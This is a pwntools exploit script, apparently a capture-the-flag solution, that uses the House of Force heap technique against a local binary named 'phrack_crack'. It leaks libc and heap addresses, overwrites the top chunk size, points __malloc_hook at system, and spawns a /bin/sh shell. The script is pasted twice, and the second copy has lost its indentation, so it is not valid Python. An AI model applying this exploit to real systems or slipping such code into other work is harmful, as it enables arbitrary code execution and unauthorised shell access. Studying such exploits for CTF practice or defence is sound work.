xct/solve.py Secret

## solve.py
from pwn import *
import binascii
context.terminal = ['alacritty', '-e', 'zsh', '-c']

# Heap: House of Force

# gdb hack
def _new_binary():
	return "gdb-gef"
gdb.binary = _new_binary

#p = remote('',13377, level='debug')
p = process("./phrack_crack", level="debug")
elf = context.binary = ELF("phrack_crack")
libc = ELF(elf.runpath + b"/libc.so.6")


def malloc(size, data):
	p.recvuntil(b"> ")
	p.sendline(b"1")
	p.recvuntil(b"size:")
	p.sendline(f"{size}")
	p.recvuntil(b"data:")
	p.sendline(data)


def edit(index, data):
	p.recvuntil(b"> ")
	p.sendline(b"2")
	p.recvuntil(b"index:")
	p.sendline(f"{index}")
	p.recvuntil(b"data:")
	p.send(data)

# leak libc & heap
p.recvuntil(b"you! ")
libc_leak = p.readline().rstrip(b"\n")
libc_leak = int(libc_leak, 16)
libc.address = libc_leak - libc.sym.puts
#log.info(f"Libc Base: {hex(libc.address)}")
p.recvuntil(b"you: ")
heap_leak = p.readline().rstrip(b"\n")
heap_leak = int(heap_leak, 16)
heap_base = heap_leak - 0x220
#log.info(f"Heap Base: {hex(heap_base)}")

gdb.attach(p, '''
set follow-fork-mode child
b *free
continue
''')

# override top chunk size with 0xffffffffffffffff to allow huge allocations
malloc(24, b"A"*24)
top_chunk_override = b"B"*(24) + p64(0xffffffffffffffff)
edit(0, top_chunk_override)

# allocate malloc hook
# it will not allocate at the target we give it, it will go from the base and allocate a big chunk that leads up to our malloc_hook
target = (libc.symbols['__malloc_hook'] - heap_base - 0x1330)
log.info(f"Heap base:                   {hex(heap_base)}")
log.info(f"Allocation size:             {hex(target)}")
log.info(f"Heap base + allocation size: {hex(target+heap_base)}")
log.info(f"__malloc_hook:               {hex(libc.symbols['__malloc_hook'])}")

malloc(target, b"")

# write system to malloc hook
malloc(8, p64(libc.symbols['system']))

# call malloc (will be system, so we can provide an arg)
malloc(next(libc.search(b'/bin/sh')),"")

p.interactive()
	from pwn import *
	import binascii
	context.terminal = ['alacritty', '-e', 'zsh', '-c']

	# Heap: House of Force

	# gdb hack
	def _new_binary():
	return "gdb-gef"
	gdb.binary = _new_binary

	#p = remote('',13377, level='debug')
	p = process("./phrack_crack", level="debug")
	elf = context.binary = ELF("phrack_crack")
	libc = ELF(elf.runpath + b"/libc.so.6")


	def malloc(size, data):
	p.recvuntil(b"> ")
	p.sendline(b"1")
	p.recvuntil(b"size:")
	p.sendline(f"{size}")
	p.recvuntil(b"data:")
	p.sendline(data)


	def edit(index, data):
	p.recvuntil(b"> ")
	p.sendline(b"2")
	p.recvuntil(b"index:")
	p.sendline(f"{index}")
	p.recvuntil(b"data:")
	p.send(data)

	# leak libc & heap
	p.recvuntil(b"you! ")
	libc_leak = p.readline().rstrip(b"\n")
	libc_leak = int(libc_leak, 16)
	libc.address = libc_leak - libc.sym.puts
	#log.info(f"Libc Base: {hex(libc.address)}")
	p.recvuntil(b"you: ")
	heap_leak = p.readline().rstrip(b"\n")
	heap_leak = int(heap_leak, 16)
	heap_base = heap_leak - 0x220
	#log.info(f"Heap Base: {hex(heap_base)}")

	gdb.attach(p, '''
	set follow-fork-mode child
	b *free
	continue
	''')

	# override top chunk size with 0xffffffffffffffff to allow huge allocations
	malloc(24, b"A"*24)
	top_chunk_override = b"B"*(24) + p64(0xffffffffffffffff)
	edit(0, top_chunk_override)

	# allocate malloc hook
	# it will not allocate at the target we give it, it will go from the base and allocate a big chunk that leads up to our malloc_hook
	target = (libc.symbols['__malloc_hook'] - heap_base - 0x1330)
	log.info(f"Heap base: {hex(heap_base)}")
	log.info(f"Allocation size: {hex(target)}")
	log.info(f"Heap base + allocation size: {hex(target+heap_base)}")
	log.info(f"__malloc_hook: {hex(libc.symbols['__malloc_hook'])}")

	malloc(target, b"")

	# write system to malloc hook
	malloc(8, p64(libc.symbols['system']))

	# call malloc (will be system, so we can provide an arg)
	malloc(next(libc.search(b'/bin/sh')),"")

	p.interactive()